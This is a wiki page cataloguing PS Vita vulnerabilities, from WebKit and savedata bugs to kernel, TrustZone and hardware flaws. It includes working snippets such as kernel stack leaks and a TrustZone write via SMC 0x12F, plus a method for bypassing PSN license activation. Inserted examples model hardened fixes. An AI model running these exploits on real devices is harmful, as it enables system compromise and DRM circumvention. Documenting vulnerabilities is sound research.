This means that to activate a PSVita, we only have to spoof the firmware version to bypass the FW update popup and spoof a recent PSN passcode key in SceShell. Both are done by taiHENkaku 3.60-3.68. This also means ReStore / ReNpDrm is not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Stack leak using sceIoDevctl from userland applications ===<br />
(tested successfully on firmware 0.995, fixed at least on firmware 1.030, works on later firmware via webkit)<br />
<pre><br />
// let's make a buffer filled with 0x66 bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, sizeof(outbuf));<br />
<br />
sceIoOpen("molecule0:", 0, 0); // sceIoOpen to populate the kernel stack<br />
<br />
// and now, let's get the stack back and check whether our data was actually written there..<br />
// (pass outbuf, not &outbuf: the argument is a char pointer, not a pointer to the array)<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, outbuf, 0x3FF);<br />
hex_dump("kstack", (unsigned char *) outbuf, 0x400);<br />
</pre><br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Confirmed exploitable before 1.80. Tested on 1.50 and 1.61.<br />
<br />
Patched on 1.80. They also added an IsShell check.<br />
<br />
=== sceIoDevctl does not clear stack buffer (henkaku kernel exploit) ===<br />
<br />
Discovered on 2014-11-24.<br />
<br />
Only works from WebKit, not from an fself nor a game.<br />
<br />
Call some functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call devctl and get up to 0x3FF bytes of that stack!<br />
<br />
<source lang="c"><br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, WINDOW_BASE+0x10, 0x3FF);<br />
store(RET, WINDOW_BASE+0x4);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
(2015-07-03) A large syscall number passed in R12 is not bounds-checked, so it indexes past the end of the syscall table and causes an arbitrary function pointer to be dereferenced and executed.<br />
<br />
This was patched in 1.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05. Implemented in HENkaku. See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup]<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available, instead of returning NULL it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang="c"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
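<br />
The lock-dropping pattern behind the race above, modelled in plain C as an added illustration (not SceNetPs code): the socket table, the blocking allocator and the competing thread are simulated so the interleaving is deterministic, and the vulnerable shape (reuse the pointer obtained before the wait) is shown beside a hardened one (hold a reference across the wait). The (0x80, 0x1000] size range comes from the text; <code>NSOCK</code>, <code>setup_race</code> and every other name are constructed for the example.<br />
<br />
```c
/* Added example: model of a blocking allocation that releases a lock, and of
 * the use-after-free that follows. Not SceNetPs code; everything here is a
 * constructed simulation. */
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define NSOCK 4

struct sock { bool in_use; int refs; };
static struct sock table[NSOCK];
static int victim = -1;   /* socket the simulated racer will try to close */

/* Simulated "other thread": runs in the window where the global mutex is
 * released; closes `victim` unless something still holds a reference. */
static void racer_close_socket(void)
{
    if (victim >= 0 && victim < NSOCK && table[victim].in_use && table[victim].refs == 0)
        table[victim].in_use = false;
}

/* Blocking allocator modelled on the malloc-with-wait-flag-0 described above:
 * when it has to wait it drops the mutex, and another thread gets to run. */
static void *alloc_blocking(size_t memsz)
{
    static char pool[0x1000];
    racer_close_socket();               /* happens while the mutex is dropped */
    return memsz <= sizeof pool ? pool : NULL;
}

static struct sock *lookup(int s)
{
    return (s >= 0 && s < NSOCK && table[s].in_use) ? &table[s] : NULL;
}

/* Range the text gives for the heap-allocated path: (0x80, 0x1000]. */
static bool uses_heap_buffer(size_t memsz)
{
    return memsz > 0x80 && memsz <= 0x1000;
}

/* Vulnerable shape: the socket pointer obtained before the blocking allocation
 * is used after it. Returns 1 if the socket had been closed in the gap (the
 * use-after-free), 0 on a clean run, -1 if the socket or size was invalid. */
int ioctl_vulnerable(int s, size_t memsz)
{
    struct sock *so = lookup(s);
    if (!so || !uses_heap_buffer(memsz))
        return -1;
    void *buf = alloc_blocking(memsz);
    if (!buf)
        return -1;
    return so->in_use ? 0 : 1;          /* `so` may now point at a freed socket */
}

/* Hardened shape: take a reference across the blocking call so the close is
 * deferred; re-looking the socket up after reacquiring the mutex works too. */
int ioctl_hardened(int s, size_t memsz)
{
    struct sock *so = lookup(s);
    if (!so || !uses_heap_buffer(memsz))
        return -1;
    so->refs++;
    void *buf = alloc_blocking(memsz);
    so->refs--;
    if (!buf || !so->in_use)
        return -1;
    return 0;
}

/* Reset the table with socket `s` open and arm the racer against it. */
void setup_race(int s)
{
    memset(table, 0, sizeof table);
    if (s >= 0 && s < NSOCK)
        table[s].in_use = true;
    victim = s;
}
```
<br />
The point of the model is the invariant, not the threads: any pointer looked up under a lock is only valid while that lock is held, so a call that can sleep and release it invalidates every such pointer unless a reference was taken first.<br />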
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or just before.<br />
<br />
==== kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
=== SceNgs design flaws (h-encore kernel exploits) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore 3.65-3.68.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== kstack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be XORed, or SCE_NGS_ERROR_INVALID will be returned by sceNgsRackGetRequiredMemorySize.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME value makes finding the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 // value specific to firmware 1.692<br />
<br />
SceInt32 gRet = 0; // last return code, kept for debugging<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
    SceInt32 ret = 0;<br />
<br />
    SceNgsRackDescription rackDesc;<br />
    rackDesc.nChannelsPerVoice = 1;<br />
    rackDesc.nVoices = 1;<br />
    rackDesc.nMaxPatchesPerInput = 0;<br />
    rackDesc.nPatchesPerOutput = 1;<br />
<br />
    // fake voice definition, left behind on the kernel stack by sceIoDevctl<br />
    unsigned int voiceDef[0x400];<br />
    memset(voiceDef, 0x00, sizeof(voiceDef));<br />
    voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
    voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
    voiceDef[2] = 0x40;<br />
    voiceDef[3] = 0x40;<br />
    sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
    sceKernelDelayThread(2 * 1000 * 1000);<br />
<br />
    // probe one page at a time (address not XORed, see the note above):<br />
    // every address that does not hold the planted definition is rejected<br />
    for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
    {<br />
        rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition *)(addr);<br />
        ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
        gRet = ret;<br />
        if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
            continue;<br />
        return addr - DEVCTL_STACK_FRAME; // kernel stack base<br />
    }<br />
    return 0xFFFFFFFF; // not found<br />
}<br />
</source><br />
<br />
=== memcpy bugs (h-encore kernel exploit) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The two following bugs are exploited by calling memcpy with a negative length, which gives an out-of-bounds access without copying an excessively large buffer or triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, adding it to dst yields a value smaller than dst due to integer overflow. As a consequence, the comparison later in the code evaluates to false, no matter whether it is a signed or unsigned comparison, and memcpy believes there are fewer than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. Hence a negative length simply bypasses the copy loop.<br />
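<br />
Both memcpy bugs modelled as an added example, not the Vita kernel's memcpy (whose code is not on this page): a range check that forms dst + len and wraps, a length classification that compares as signed, and the hardened form of each, followed by a guarded copy that applies the hardened checks before moving any bytes. The 32-byte small-copy threshold is from the text; <code>guarded_copy</code>, the demo region and source buffer and all other names are constructed.<br />
<br />
```c
/* Added example: the two flawed checks described above and their hardened
 * forms. Not kernel code; names and demo buffers are constructed. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Flawed range check in the shape described above: forms dst + len and
 * compares it with the end of the allowed region. A "negative" len such as
 * (size_t)-8 wraps the sum to a value below dst, so the check passes. */
bool flawed_in_bounds(uintptr_t base, size_t size, uintptr_t dst, size_t len)
{
    uintptr_t end = dst + len;      /* may wrap around */
    return dst >= base && end <= base + size;
}

/* Flawed length classification: comparing as a signed integer makes a
 * negative length look "small", so the 32-byte small-copy path is taken. */
bool flawed_is_small_copy(size_t len)
{
    return (ptrdiff_t)len < 32;
}

/* Hardened range check: never form dst + len. Check that dst lies inside the
 * region first, then compare len with the room that is actually left. */
bool hardened_in_bounds(uintptr_t base, size_t size, uintptr_t dst, size_t len)
{
    if (dst < base || dst > base + size)     /* base + size assumed not to wrap */
        return false;
    size_t room = (size_t)((base + size) - dst);
    return len <= room;
}

/* Hardened length classification: unsigned compare, no sign to abuse. */
bool hardened_is_small_copy(size_t len)
{
    return len < 32;
}

/* Constructed demo buffers so the guarded copy can be exercised. */
static uint8_t demo_region[64];
static const uint8_t demo_src[8] = { 1, 2, 3, 4, 5, 6, 7, 8 };

/* Guarded copy into region[off..]: the hardened check runs before any byte
 * moves. Returns the number of bytes copied, or 0 when the copy is rejected. */
size_t guarded_copy(uint8_t *region, size_t size, size_t off, const uint8_t *src, size_t len)
{
    uintptr_t base = (uintptr_t)region;
    if (off > size || !hardened_in_bounds(base, size, base + off, len))
        return 0;
    for (size_t i = 0; i < len; i++)    /* small vs bulk path not modelled */
        region[off + i] = src[i];
    return len;
}

/* Copy demo_src into demo_region at `off` through the guarded path. */
size_t demo_copy(size_t off, size_t len)
{
    return guarded_copy(demo_region, sizeof demo_region, off, demo_src, len);
}

/* Read back a byte of the demo region, or -1 when out of range. */
int demo_region_byte(size_t off)
{
    return off < sizeof demo_region ? demo_region[off] : -1;
}
```
<br />
The general rule the hardened check follows: compare a length against the space remaining rather than adding it to a pointer, and keep lengths unsigned end to end, so that a huge value is rejected as huge instead of being reinterpreted as a small negative one.<br />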
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization: the eMMC MBR can be modified to change the block size. Yifan tried to exploit it via an adjacent malloc(controlled_size), couldn't find a way, and left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyz finds a way to exploit the buffer overflow. He discovers a logic flaw related to error code propagation in NSBL: a function does not check an error return; if it did, the value corrupted by the buffer overflow would not have been used. Later on, the field that was written is used in a separate call.<br />
<br />
This allows a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
=== SMC 0x12F does not validate arguments -> TrustZone level arbitrary code execution ===<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
(2017-01-01) SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table).<br />
<br />
This results in TrustZone level arbitrary code execution.<br />
<br />
It was patched after 1.80 and before 2.10.<br />
<br />
A list of 1.80 TrustZone module imports/exports is available [https://pastebin.com/59pe8jBg here].<br />
<br />
Example code exploiting this vulnerability:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
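<br />
The checks the handler lacked, as an added example and not TrustZone or Vita code: a model SMC handler that only accepts handles registered in a table and bounds <code>shared_mem_index</code> by the slot count, using the shared-region geometry given above (0x5000 bytes, 0x80-byte blocks, an 8-byte result). The handle value, <code>sm_register</code>, <code>sm_reset</code>, <code>shmem_slot</code> and the in-memory stand-in for the shared region are constructed for the example.<br />
<br />
```c
/* Added example: argument validation for a status-reporting SMC, modelled on
 * the geometry described above. Not secure-world code; the handle table and
 * the shared-region stand-in are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SHMEM_SIZE   0x5000u                     /* shared region size, from above */
#define SHMEM_BLOCK  0x80u                       /* one status slot per 0x80 bytes */
#define STATUS_LEN   8u                          /* the 8 bytes the SMC returns */
#define SHMEM_SLOTS  (SHMEM_SIZE / SHMEM_BLOCK)  /* 0xA0 slots */
#define MAX_SM       4

static uint8_t shmem[SHMEM_SIZE];                /* stands in for the shared region */

/* Only handles registered here are valid: a caller-supplied (addr >> 1) that
 * is not in the table is rejected instead of being dereferenced. */
struct sm_record { uint32_t handle; uint64_t status; };
static struct sm_record sm_table[MAX_SM];
static int sm_count;

void sm_reset(void)
{
    sm_count = 0;
    memset(shmem, 0, sizeof shmem);
}

/* Register a secure module; returns its slot or -1 when the table is full. */
int sm_register(uint32_t handle, uint64_t status)
{
    if (sm_count >= MAX_SM)
        return -1;
    sm_table[sm_count].handle = handle;
    sm_table[sm_count].status = status;
    return sm_count++;
}

/* Hardened handler: resolve the handle through the table and bound the index
 * by the slot count, so index * 0x80 + 8 can never leave the region
 * (STATUS_LEN <= SHMEM_BLOCK, so the slot bound is sufficient, and the
 * multiplication is only performed on an already-checked value).
 * Returns 0 on success, -1 for an unknown handle, -2 for a bad index. */
int smc_get_status_checked(uint32_t sm_handle, uint32_t shared_mem_index)
{
    const struct sm_record *rec = NULL;
    for (int i = 0; i < sm_count; i++) {
        if (sm_table[i].handle == sm_handle) {
            rec = &sm_table[i];
            break;
        }
    }
    if (rec == NULL)
        return -1;
    if (shared_mem_index >= SHMEM_SLOTS)
        return -2;
    memcpy(&shmem[shared_mem_index * SHMEM_BLOCK], &rec->status, STATUS_LEN);
    return 0;
}

/* Read a slot back (for checking); returns 0 for an out-of-range slot. */
uint64_t shmem_slot(uint32_t idx)
{
    uint64_t v = 0;
    if (idx < SHMEM_SLOTS)
        memcpy(&v, &shmem[idx * SHMEM_BLOCK], STATUS_LEN);
    return v;
}
```
<br />
Two properties make the difference: the handle is an opaque key looked up in a trusted table rather than an address the caller chose, and the index is bounded by the slot count before it is scaled, so the write target is always a slot inside the shared region and never an arbitrary secure-world address.<br />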
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== To be disclosed ===<br />
<br />
(2017-02-23) To be disclosed.<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== moth exploit ===<br />
<br />
(2019-02-05) To be disclosed.<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=10698Vulnerabilities2019-02-06T15:47:25Z<p>Xyz: /* F00D Processor */</p>
<hr />
<div>== Userland ==<br />
<br />
=== Webkit exploits in Email app ===<br />
<br />
Implemented by xyz so that HENkaku can be launched offline.<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup]<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref>, using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using a NaN as the argument.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains fewer entries than the original one, a limited 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
Discovered by xyz. Fixed in 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit simplified code by St4rk]<br />
<br />
=== PSM Mono privilege escalation ===<br />
<br />
https://yifan.lu/2015/06/21/hacking-the-ps-vita/<br />
<br />
=== PSM Unity privilege escalation ===<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
=== PSM NetworkRequest privilege escalation ===<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Games savedata exploits (h-encore) ===<br />
<br />
Discovered in 2015 by TheFloW. Released on 2018-06-29.<br />
<br />
Exploitable in theory on any firmware (not patchable, or only with difficulty).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is that games developed with SDK 2.60 or lower were compiled as statically linked executables, so their load address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also don't have stack protection enabled by default, which means that if we can smash the stack in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you just fuzz gamesaves by writing random data at random locations until you get a crash (the best bet is extending strings and hoping that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow ====<br />
<br />
The Bittersmile game was found exploitable on 2018-02-17 by Freakler. The exploit was implemented by TheFloW in h-encore.<br />
<br />
The bug lies in the parser of the Bittersmile game. The gamesave is actually a text file; the game reads it line by line and copies each line into one of a list of buffers. However, it doesn't validate the length, so if we put the \n delimiter far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. It is in the data section instead, but luckily for us the content after the buffer is the list that holds the destinations for the other lines. This means that if we overflow into the list and redirect the buffer pointer, we can copy the next line to wherever we want, which gives us an arbitrary write primitive.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow writeup]<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can secure PSVita's store as much as they want; we will always be able to activate as long as the PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate a PSVita, we only have to spoof the firmware version to bypass the FW update popup and spoof a recent PSN passcode key in SceShell. Both are done by taiHENkaku 3.60-3.68. This also means ReStore / ReNpDrm is not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Stack leak using sceIoDevctl from userland applications ===<br />
(tested successfully on firmware 0.995, fixed at least on firmware 1.030, works on later firmware via webkit)<br />
<pre><br />
// let's make a buffer filled with 0x66 bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, sizeof(outbuf));<br />
<br />
sceIoOpen("molecule0:", 0, 0); // sceIoOpen to populate the kernel stack<br />
<br />
// and now, let's get the stack back and check whether our data was actually written there..<br />
// (pass outbuf, not &outbuf: the argument is a char pointer, not a pointer to the array)<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, outbuf, 0x3FF);<br />
hex_dump("kstack", (unsigned char *) outbuf, 0x400);<br />
</pre><br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Confirmed exploitable before 1.80. Tested on 1.50 and 1.61.<br />
<br />
Patched on 1.80. They also added an IsShell check.<br />
<br />
=== sceIoDevctl does not clear stack buffer (henkaku kernel exploit) ===<br />
<br />
Discovered on 2014-11-24.<br />
<br />
Only works from WebKit, not from an fself nor a game.<br />
<br />
Call some functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call devctl and get up to 0x3FF bytes of that stack!<br />
<br />
<source lang="c"><br />
